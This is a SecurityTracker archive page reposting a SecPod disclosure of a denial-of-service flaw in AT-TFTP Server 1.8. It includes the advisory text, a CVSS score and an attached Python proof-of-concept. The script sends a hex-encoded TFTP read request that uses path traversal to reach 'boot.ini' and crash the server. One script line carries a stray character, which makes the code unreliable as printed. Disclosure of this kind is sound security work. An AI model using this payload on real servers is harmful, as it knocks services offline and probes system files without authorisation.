SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (File Transfer/Sharing)  >   AT-TFTP Server Vendors:   Allied Telesyn International
AT-TFTP Server Protocol Error Lets Remote Users Deny Service
SecurityTracker Alert ID:  1025437
SecurityTracker URL:  http://securitytracker.com/id/1025437
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 25 2011
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.8
Description:   A vulnerability was reported in AT-TFTP Server. A remote user can cause denial of service conditions.

A remote user can avoid sending an acknowledgement response to the server after a successful read operation to cause the target 'TFTPD.EXE' service service to crash.

The vendor was notified on April 4, 2011.

Antu Sanadi of SecPod Technologies reported this vulnerability.
Impact:   A remote user can cause denial of service conditions on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.alliedtelesis.eu/ (Links to External Site)
Cause:   State error
Underlying OS:   Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Mon, 25 Apr 2011 15:31:19 +0530
Subject:  AT-TFTP Server Remote Denial of Service Vulnerability

This is a multi-part message in MIME format.

--Boundary_(ID_clbnw4SnVS8VJ/feV0tqvg)
Content-type: text/plain; CHARSET=US-ASCII; format=flowed
Content-transfer-encoding: 7BIT

Hi,

SecPod Research Team Member Antu Sanadi has found a DoS
Vulnerability in AT-TFTP Server

Advisory and POC details has been attached to this mail.


Regards,
SecPod Research Team
http://www.secpod.com







--Boundary_(ID_clbnw4SnVS8VJ/feV0tqvg)
Content-type: text/plain; name=SecPod_AT_TFTP_DoS.txt
Content-transfer-encoding: 7BIT
Content-disposition: attachment; filename=SecPod_AT_TFTP_DoS.txt

###############################################################################
AT-TFTP Server v1.8 Remote Denial of Service  Vulnerability

SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################

SecPod ID: 1013					01/04/2011 Issue Discovered
						04/04/2011 Vendor Notified
						No Response from the Vendor
						25/04/2011 Advisory Released
					       

Class: Denial of Service			Severity: High


Overview:
---------
AT-TFTP Server v1.8 is prone to a remote Denial of Service vulnerability
as it fails to handle 'read' requests from the client properly.


Technical Description:
----------------------
The vulnerability is caused by an error in the "TFTPD.EXE" which causes the
server to crash when no acknowledgement response is sent back to the server
after a successful 'read'.


Impact:
--------
Successful exploitation could allow an attacker to crash a vulnerable server.


Affected Software:
------------------
AT-TFTP Server version 1.8

Tested on,
AT-TFTP Server version 1.8 on Windows XP SP3


References:
-----------
http://secpod.org/blog/?p=194
http://www.alliedtelesis.co.nz/
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py
http://secpod.org/advisories/SecPod_AT_TFTP_DoS.txt


Proof of Concept:
----------------
http://secpod.org/blog/?p=194
http://secpod.org/SecPod_AT_TFTP_DoS-POC.py


Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report: 
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NONE
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = COMPLETE
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 7.8 (High) (AV:N/AC:L/Au:N/C:N/I:N/A:C)


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

--Boundary_(ID_clbnw4SnVS8VJ/feV0tqvg)
Content-type: text/plain; name=SecPod_AT_TFTP_DoS-POC.py
Content-transfer-encoding: 7BIT
Content-disposition: attachment; filename=SecPod_AT_TFTP_DoS-POC.py

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference : 
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

addr = (host,port)1

data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))

--Boundary_(ID_clbnw4SnVS8VJ/feV0tqvg)--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC